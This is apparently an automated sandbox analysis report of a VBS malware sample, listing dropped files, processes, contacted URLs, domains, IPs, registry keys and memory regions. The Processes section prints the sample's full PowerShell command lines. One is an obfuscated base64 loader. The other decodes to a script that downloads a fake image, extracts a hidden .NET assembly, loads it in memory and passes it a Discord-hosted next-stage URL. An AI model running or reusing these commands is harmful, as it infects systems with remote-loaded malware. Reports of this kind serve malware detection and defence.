Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
windows.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\umxfl[1].txt
|
Unicode text, UTF-8 text, with very long lines (13333), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ix2nzop.rp0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gccontde.5xx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xlmr2nss.zwp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykwpcdqs.ccj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
\Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON
|
data
|
dropped
|
||
|
\Device\Mup\user-PC\PIPE\samr
|
GLS_BINARY_LSB_FIRST
|
dropped
|
||
|
\Device\Mup\user-PC\PIPE\wkssvc
|
GLS_BINARY_LSB_FIRST
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreMDgTreBmDgTreDDgTreDgTreMDgTreBjDgTreGQDgTreMgBhDgTreDMDgTreMDgTreDgTrexDgTreDkDgTreOQBjDgTreDcDgTreOQDgTre2DgTreDUDgTreMwDgTre0DgTreDMDgTreNgDgTre2DgTreDMDgTreZQBmDgTreGIDgTreODgTreDgTre4DgTreGUDgTreZgDgTre1DgTreGEDgTreNDgTreDgTre5DgTreDDgTreDgTreMQDgTre2DgTreDQDgTreMgBlDgTreDcDgTreZQBlDgTreDUDgTreZgDgTre5DgTreDcDgTreZDgTreDgTre1DgTreDgDgTreNDgTreDgTrewDgTreGUDgTreODgTreBhDgTreGEDgTreZDgTreDgTrexDgTreGUDgTreZQBhDgTreGYDgTreYQDgTre9DgTreG0DgTreaDgTreDgTremDgTreDDgTreDgTreZgBhDgTreGMDgTreMwDgTrezDgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreDDgTreDgTreNwBjDgTreDEDgTreNQDgTrezDgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTrecwB3DgTreG8DgTreZDgTreBuDgTreGkDgTredwDgTrevDgTreDYDgTreMwDgTrexDgTreDQDgTreNgDgTre3DgTreDkDgTreNgDgTre4DgTreDYDgTreMgDgTre2DgTreDEDgTreNDgTreDgTre2DgTreDUDgTreMwDgTreyDgTreDEDgTreLwDgTrezDgTreDQDgTreNgDgTrexDgTreDkDgTreMQDgTrexDgTreDEDgTreNQDgTrezDgTreDIDgTreMDgTreDgTre3DgTreDIDgTreNgDgTre1DgTreDMDgTreMgDgTrexDgTreC8DgTrecwB0DgTreG4DgTreZQBtDgTreGgDgTreYwBhDgTreHQDgTredDgTreBhDgTreC8DgTrebQBvDgTreGMDgTreLgBwDgTreHDgTreDgTreYQBkDgTreHIDgTrebwBjDgTreHMDgTreaQBkDgTreC4DgTrebgBkDgTreGMDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreLDgTreDgTrenDgTreEEDgTreZDgTreBkDgTreEkDgTrebgBQDgTreHIDgTrebwBjDgTreGUDgTrecwBzDgTreDMDgTreMgDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029',
'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth'
, 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://uploaddeimagens.com.br
|
unknown
|
|
|
|
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
|
188.114.96.3
|
|
|
|
https://paste.ee/d/umxfl
|
188.114.97.3
|
|
|
|
http://app01.system.com.br/RDWeb/Pages/login.aspx
|
unknown
|
|
|
|
http://crl.microsoft~#
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://app01.system.com.br/RDWeb/Pages/login.aspx_Tex
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://cdn.discordapp.com/attachments/1235627023511191643/1235641626869764136/windows.txt?ex=66351c70&is=6633caf0&hm=afaee1daa8e0485d79f5ee7e2461094a5fe88bfe3663435697c99103a2dc00f0&
|
162.159.129.233
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
http://uploaddeimagens.com.br
|
unknown
|
||
|
https://paste.ee/d/umxflJ
|
unknown
|
||
|
https://paste.ee/&
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://paste.ee/l
|
unknown
|
||
|
http://app01.system.com.br/RDWeb/Pages/login.aspxd
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://paste.ee/d/umxflerD
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://paste.ee/d/umxfl&
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
https://pastsubposto.subpostosubposto/d/umxfl
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://go.microsoft.coT
|
unknown
|
||
|
https://pastsubposto.subpostosubposto/d/um
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.97.3
|
|
|
|
uploaddeimagens.com.br
|
188.114.96.3
|
|
|
|
cdn.discordapp.com
|
162.159.129.233
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
paste.ee
|
European Union
|
|
|
|
188.114.96.3
|
uploaddeimagens.com.br
|
European Union
|
|
|
|
162.159.129.233
|
cdn.discordapp.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
A7919FE000
|
stack
|
page read and write
|
||
|
1D4AC098000
|
trusted library allocation
|
page read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
1250FDC5000
|
heap
|
page read and write
|
||
|
12510BB0000
|
heap
|
page read and write
|
||
|
A791D3E000
|
stack
|
page read and write
|
||
|
7FFE1691A000
|
trusted library allocation
|
page read and write
|
||
|
1D4ABC7C000
|
trusted library allocation
|
page read and write
|
||
|
A791EBC000
|
stack
|
page read and write
|
||
|
A7916FF000
|
stack
|
page read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
7FFE16980000
|
trusted library allocation
|
page read and write
|
||
|
DB1EC3B000
|
stack
|
page read and write
|
||
|
1250E0C1000
|
heap
|
page read and write
|
||
|
12510740000
|
trusted library allocation
|
page read and write
|
||
|
1250FD7E000
|
heap
|
page read and write
|
||
|
1D4ABF46000
|
trusted library allocation
|
page read and write
|
||
|
1D4BBB11000
|
trusted library allocation
|
page read and write
|
||
|
1D4A9D90000
|
heap
|
page readonly
|
||
|
2CA158B3000
|
trusted library allocation
|
page read and write
|
||
|
2CA1BB75000
|
trusted library allocation
|
page read and write
|
||
|
125100F3000
|
heap
|
page read and write
|
||
|
12FE1FC000
|
stack
|
page read and write
|
||
|
2CA15AEB000
|
trusted library allocation
|
page read and write
|
||
|
12510B67000
|
heap
|
page read and write
|
||
|
1D4C3C5A000
|
heap
|
page read and write
|
||
|
1250E000000
|
heap
|
page read and write
|
||
|
12510E44000
|
heap
|
page read and write
|
||
|
1250FDC5000
|
heap
|
page read and write
|
||
|
1D4A9AFF000
|
heap
|
page read and write
|
||
|
12510114000
|
heap
|
page read and write
|
||
|
7FFE16846000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D4C3CC7000
|
heap
|
page read and write
|
||
|
1250FDB7000
|
heap
|
page read and write
|
||
|
DB1E8B7000
|
stack
|
page read and write
|
||
|
1D4A9AE0000
|
heap
|
page read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
1250E029000
|
heap
|
page read and write
|
||
|
1250E0E7000
|
heap
|
page read and write
|
||
|
2CA178EB000
|
trusted library allocation
|
page read and write
|
||
|
12510B8C000
|
heap
|
page read and write
|
||
|
1D4AB7C0000
|
heap
|
page read and write
|
||
|
7FFE16880000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE16A40000
|
trusted library allocation
|
page read and write
|
||
|
125100D0000
|
heap
|
page read and write
|
||
|
DB1E9B8000
|
stack
|
page read and write
|
||
|
DB1E93C000
|
stack
|
page read and write
|
||
|
1250FD80000
|
heap
|
page read and write
|
||
|
12FE6FB000
|
stack
|
page read and write
|
||
|
1D4C3C25000
|
heap
|
page read and write
|
||
|
12510B40000
|
heap
|
page read and write
|
||
|
1D4A9B58000
|
heap
|
page read and write
|
||
|
7FFE16942000
|
trusted library allocation
|
page read and write
|
||
|
1D4AC248000
|
trusted library allocation
|
page read and write
|
||
|
1D4A9D80000
|
trusted library allocation
|
page read and write
|
||
|
1250E030000
|
heap
|
page read and write
|
||
|
125100F6000
|
heap
|
page read and write
|
||
|
1D4A9DA0000
|
trusted library allocation
|
page read and write
|
||
|
12510E51000
|
heap
|
page read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
1D4C3E62000
|
heap
|
page read and write
|
||
|
1250E0B2000
|
heap
|
page read and write
|
||
|
1250E0B2000
|
heap
|
page read and write
|
||
|
1D4C3C8A000
|
heap
|
page read and write
|
||
|
1250E085000
|
heap
|
page read and write
|
||
|
1250FDC5000
|
heap
|
page read and write
|
||
|
1D4A9B3A000
|
heap
|
page read and write
|
||
|
2CA13731000
|
heap
|
page read and write
|
||
|
125100F6000
|
heap
|
page read and write
|
||
|
7FFE16764000
|
trusted library allocation
|
page read and write
|
||
|
1D4C3D20000
|
heap
|
page read and write
|
||
|
1250E082000
|
heap
|
page read and write
|
||
|
125100FE000
|
heap
|
page read and write
|
||
|
DB1E47E000
|
stack
|
page read and write
|
||
|
12510B71000
|
heap
|
page read and write
|
||
|
2CA139A0000
|
trusted library allocation
|
page read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
7FFE16762000
|
trusted library allocation
|
page read and write
|
||
|
12FE0FC000
|
stack
|
page read and write
|
||
|
1250E0A1000
|
heap
|
page read and write
|
||
|
7FFE16950000
|
trusted library allocation
|
page execute and read and write
|
||
|
1250E0F3000
|
heap
|
page read and write
|
||
|
1D4A9B40000
|
heap
|
page read and write
|
||
|
12510B60000
|
heap
|
page read and write
|
||
|
DB1E5FD000
|
stack
|
page read and write
|
||
|
12510B9B000
|
heap
|
page read and write
|
||
|
1D4ABB96000
|
trusted library allocation
|
page read and write
|
||
|
2CA13739000
|
heap
|
page read and write
|
||
|
1D4A9D20000
|
heap
|
page read and write
|
||
|
2CA13718000
|
heap
|
page read and write
|
||
|
12510200000
|
heap
|
page read and write
|
||
|
1250E0BA000
|
heap
|
